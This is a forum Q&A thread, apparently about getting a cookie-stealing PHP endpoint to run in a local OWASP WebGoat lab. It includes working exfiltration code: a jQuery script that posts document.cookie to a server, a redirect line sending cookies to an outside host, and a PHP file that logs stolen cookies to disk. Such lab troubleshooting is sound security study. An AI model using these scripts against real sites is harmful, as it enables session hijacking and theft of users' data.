How to call a PHP script from Javascript in HTML

We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!

This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.

For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:

<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;

Select allOpen in new window

And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>

Select allOpen in new window

Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.

This worked for the front-end script and it echoed the appropriate data:

<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>

Select allOpen in new window

Output:

Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}

Select allOpen in new window

I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.

I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parametersview sourceview URL encoded
cookie:**********************
Response Headersview source
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1

You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.

Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal reponse back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>

I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.

Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.

Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.

You're welcome.